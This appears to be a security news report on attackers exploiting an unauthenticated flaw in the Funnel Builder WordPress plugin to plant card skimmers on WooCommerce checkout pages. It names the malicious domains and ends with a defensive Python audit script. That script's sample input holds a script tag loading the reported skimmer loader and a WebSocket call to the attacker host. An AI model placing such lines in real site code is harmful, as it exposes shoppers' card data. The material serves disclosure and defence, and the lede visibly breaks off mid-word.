WordPress Funnel Builder flaw used to steal checkout card data

A critical vulnerability in the Funnel Builder WordPress plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, enabling attackers to steal credit card details and other customer information. The issue affects all ve
Something is rewriting what shoppers see right at the moment they’re entering payment details. Security researchers say attackers are exploiting a flaw in the Funnel Builder WordPress plugin to inject malicious JavaScript into WooCommerce checkout pages, turning checkout customization features into a delivery mechanism for card skimmers.
The problem is tied to Funnel Builder, a plugin developed by FunnelKit that lets site owners reshape WooCommerce checkout screens and add functions like one-click upsells and landing pages. Sansec reports the malicious activity has been ongoing, and the plugin is installed on more than 40,000 websites, according to WordPress.org stats, meaning a successful compromise can reach a lot of transactions.
Sansec says the vulnerability has not received an official identifier and can be used without authentication. The affected versions are all releases before 3.15.0.3.
What attackers are doing, according to Sansec’s observations, is disguising the malicious payload as something that looks like legitimate tracking code. The payload is delivered from analytics-reports[.]com/wss/jquery-lib.js and presented as a fake Google Tag Manager/Google Analytics script. Instead of staying safely inside the checkout page, the injected script opens a WebSocket connection to an external location at wss://protect-wss[.]com/ws.
That connection is part of how the attacker modifies Funnel Builder’s behavior. Sansec says an attacker can alter the plugin’s global settings by targeting an unprotected, publicly exposed checkout endpoint. From there, they can insert arbitrary JavaScript into the plugin’s “External Scripts” setting. Once that setting is poisoned, the malicious code runs on every checkout page.
The goal is direct and financial. Sansec reports the attacker-controlled server delivers a customized payment card skimmer designed to steal credit card numbers, CVVs, billing addresses, and other customer information. Stolen records typically end up used for fraudulent online purchases, and they’re often sold individually or in bulk through carding markets on the dark web.
FunnelKit moved quickly to stop the bleeding. The company addressed the issue in Funnel Builder version 3.15.0.3, released yesterday. A security advisory shared with Sansec confirms the vendor’s own findings, saying: “we identified an issue that allowed bad actors to inject scripts.”
The immediate takeaway for site owners is practical: update first, then check what attackers may have already altered. FunnelKit recommends that administrators prioritize updating to the latest version from the WordPress dashboard. It also advises reviewing Settings > Checkout > External Scripts for potential rogue scripts the attacker may have added, because even after patching, any already-injected script may still be sitting in the configuration.
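One way to do that review systematically, as an added example (not code from FunnelKit or Sansec): the script below lists every host referenced in a snippet and flags the two domains reported above, regardless of how the script is labelled. It assumes the contents of the External Scripts setting, or a saved copy of the checkout page HTML, have been pasted into a string; `ALLOWED_HOSTS` and the sample input are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Indicators reported on this page, stored defanged and refanged in memory only.
REPORTED_IOCS = {d.replace("[.]", ".") for d in
                 ("analytics-reports[.]com", "protect-wss[.]com")}
# Assumption: hosts this shop intentionally loads scripts from; edit per site.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
# Absolute or protocol-relative URLs inside markup or inline JavaScript.
URL_RE = re.compile(r"""(?:(?:https?|wss?):)?//[^\s"'<>)\\]+""", re.I)


def referenced_hosts(snippet):
    """Return the set of lowercase hostnames referenced anywhere in snippet."""
    hosts = set()
    for match in URL_RE.finditer(snippet):
        url = match.group(0)
        if url.startswith("//"):          # protocol-relative reference
            url = "https:" + url
        try:
            host = urlsplit(url).hostname
        except ValueError:                # malformed authority, skip it
            continue
        if host:
            hosts.add(host.lower())
    return hosts


def audit(snippet):
    """Classify each referenced host as 'ioc', 'allowed' or 'unknown'."""
    findings = {}
    for host in sorted(referenced_hosts(snippet)):
        if any(host == d or host.endswith("." + d) for d in REPORTED_IOCS):
            findings[host] = "ioc"
        elif host in ALLOWED_HOSTS:
            findings[host] = "allowed"
        else:
            findings[host] = "unknown"    # not approved: review by hand
    return findings


# Constructed sample of a poisoned setting (domains refanged at runtime).
SAMPLE = (
    '<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>\n'
    '<script src="https://analytics-reports[.]com/wss/jquery-lib.js"></script>\n'
    '<script>new WebSocket("wss://protect-wss[.]com/ws");</script>\n'
    '<script src="//cdn.example.net/widget.js"></script>\n'
).replace("[.]", ".")

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE).items():
        print(f"{verdict:8} {host}")
```

A clean result only covers URLs written out in the snippet; a script that assembles its destination at runtime will not show up, so any entry in the setting that the site owner did not add still needs manual review.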